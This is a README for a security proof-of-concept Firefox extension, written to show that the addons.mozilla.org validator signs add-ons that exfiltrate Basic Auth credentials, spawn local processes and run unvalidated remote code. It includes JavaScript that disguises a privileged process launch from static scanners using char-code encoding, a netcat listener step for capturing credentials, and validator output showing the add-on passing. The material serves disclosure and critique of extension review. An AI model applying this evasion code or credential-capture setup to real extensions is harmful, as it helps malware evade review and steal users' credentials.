dstillman/amo-validator-bypass

AMO Validator Bypass Proof of Concept

This is a trivial Firefox extension that performs three potentially malicious tasks (exfiltrating data to a remote host, launching a local process, and running unvalidated remote code with full privileges) but would nevertheless be automatically signed by the addons.mozilla.org validator.

The validator cannot be improved to catch these behaviors. As a Mozilla engineer says:

There is simply no way to detect malicious code like this in a dynamic language like JS through static analysis of the source code.

For full context, see Automated Scanning of Firefox Extensions is Security Theater.
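To make the static-analysis point concrete, here is an added example (not code from the amo-validator-bypass repository): a toy signature scanner standing in for a static validator, and two versions of the same privileged XPCOM process launch. The scanner flags the plain version and sees nothing in the version that rebuilds its identifiers at run time, even though both do the same thing. The contract IDs "@mozilla.org/process/util;1" and "@mozilla.org/file/local;1" and the interface names nsIProcess and nsIFile are the real legacy-extension APIs; the signature list and the helper names (scanSource, toCharCodes, decodeCharCodes, recoverEncodedStrings) are assumptions made for this example and say nothing about what the real validator checks.

```javascript
// Added example; this is not code from the amo-validator-bypass repository.
// A toy signature scanner plus two versions of the same privileged XPCOM
// call. Signature list and helper names are assumptions for illustration.

// Patterns a naive validator might grep for in extension source.
const SIGNATURES = {
  nsIProcess: /nsIProcess/,
  processContract: /@mozilla\.org\/process\/util;1/,
  osascript: /osascript/,
  evalCall: /\beval\s*\(/,
  functionCtor: /\bFunction\s*\(/,
};

// Names of every signature that matches the given source text, sorted.
function scanSource(src) {
  return Object.keys(SIGNATURES)
    .filter((name) => SIGNATURES[name].test(src))
    .sort();
}

// Encode a string as comma-separated char codes. An author would run this
// once, offline, to prepare the evasive variant.
function toCharCodes(s) {
  return Array.from(s, (c) => c.charCodeAt(0)).join(",");
}

// Inverse of toCharCodes. The same logic is embedded in the evasive source
// below as d(), so no sensitive string ever appears as a literal.
function decodeCharCodes(codes) {
  return String.fromCharCode(...codes.split(",").map(Number));
}

// Plain version: every dangerous token is a literal in the source.
const PLAIN_SOURCE = `
const file = Components.classes["@mozilla.org/file/local;1"]
  .createInstance(Components.interfaces.nsIFile);
file.initWithPath("/usr/bin/osascript");
const proc = Components.classes["@mozilla.org/process/util;1"]
  .createInstance(Components.interfaces.nsIProcess);
proc.init(file);
proc.run(false, ["-e", "display dialog \\"hi\\""], 2);
`;

// Evasive version: identical behaviour at run time, but contract IDs,
// interface names, the binary path and the arguments are rebuilt from
// char codes and looked up through computed property keys. A static
// scanner sees only digits, commas and generic property access.
const EVASIVE_SOURCE = `
const d = (codes) => String.fromCharCode.apply(null, codes.split(",").map(Number));
const C = Components;
const file = C.classes[d("${toCharCodes("@mozilla.org/file/local;1")}")]
  .createInstance(C.interfaces[d("${toCharCodes("nsIFile")}")]);
file.initWithPath(d("${toCharCodes("/usr/bin/osascript")}"));
const proc = C.classes[d("${toCharCodes("@mozilla.org/process/util;1")}")]
  .createInstance(C.interfaces[d("${toCharCodes("nsIProcess")}")]);
proc.init(file);
proc.run(false, [d("${toCharCodes("-e")}"), d("${toCharCodes('display dialog "hi"')}")], 2);
`;

// Recover the strings the evasive source would compute at run time, to show
// that the scanner's blindness is not because the payload changed.
function recoverEncodedStrings(src) {
  const re = /d\("([0-9,]+)"\)/g;
  const out = [];
  let m;
  while ((m = re.exec(src)) !== null) out.push(decodeCharCodes(m[1]));
  return out;
}

console.log("plain   :", scanSource(PLAIN_SOURCE));
console.log("evasive :", scanSource(EVASIVE_SOURCE));
console.log("evasive strings at run time:", recoverEncodedStrings(EVASIVE_SOURCE));
```

The point is not that char-code encoding is clever; it is that any scanner working on source text has to decide what a computed property key or a decoded string will be without running the program, and the program can always make that decision arbitrarily hard (fetch the codes from the network, derive them from a timestamp, and so on).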

Installation

  1. git clone https://github.com/dstillman/amo-validator-bypass.git
  2. Running a dev build? Don't forget to set xpinstall.signatures.required to false! Fortunately that wouldn't be necessary once this was automatically signed…
  3. Create a text file named amo-validator-bypass@example.net in your Firefox profile's extensions directory containing the path to the cloned repo.
  4. Start Firefox.

Running

Data exfiltration

  1. Start netcat listening on a local port:
     % nc -l 11111
  2. Load http://test.webdav.org/auth-basic/ or any Basic Auth–protected site and enter any username and password.

Your Base64-encoded username and password (the Basic Auth credential exactly as the browser sends it in the Authorization header) should show up in the netcat output. This could be any other sensitive data, and it could just as easily be POSTed to a remote server.

Local process execution

(The default executable is available only on OS X. Feel free to substitute another program for your platform.)

An OS X system dialog should appear, spawned via the osascript command-line tool.

Remote code execution

  1. Start an HTTP server in the remote directory of the local repo:
     % cd remote
     % python -m SimpleHTTPServer 11112
     (SimpleHTTPServer is the Python 2 module; with Python 3 use python3 -m http.server 11112.)
  2. Load https://blog.mozilla.org/addons/2015/04/15/the-case-for-extension-signing/

An alert will appear showing the path to the Firefox profile directory. This alert is generated by unvalidated remote code that runs with full privileges.

Validating

Via amo-validator:

% ./build.sh
% amo-validator --selfhosted -v ../bypass.xpi

Summary:
------------------------------
Detected type: Extension/Multi-Extension
------------------------------
All tests succeeded!

Notice: Add-on appears not to be localized
    The add-on doesn't have any locale entries in its chrome.manifest file, which suggests that it may not be localized.
    Tier: 4
    File: chrome.manifest

Via addons-validator

% ./build.sh
% addons-validator ../bypass.xpi

Validation Summary:

errors          0
notices         0
warnings        0

Via the online validator:

Your submission passed validation and will be automatically signed.
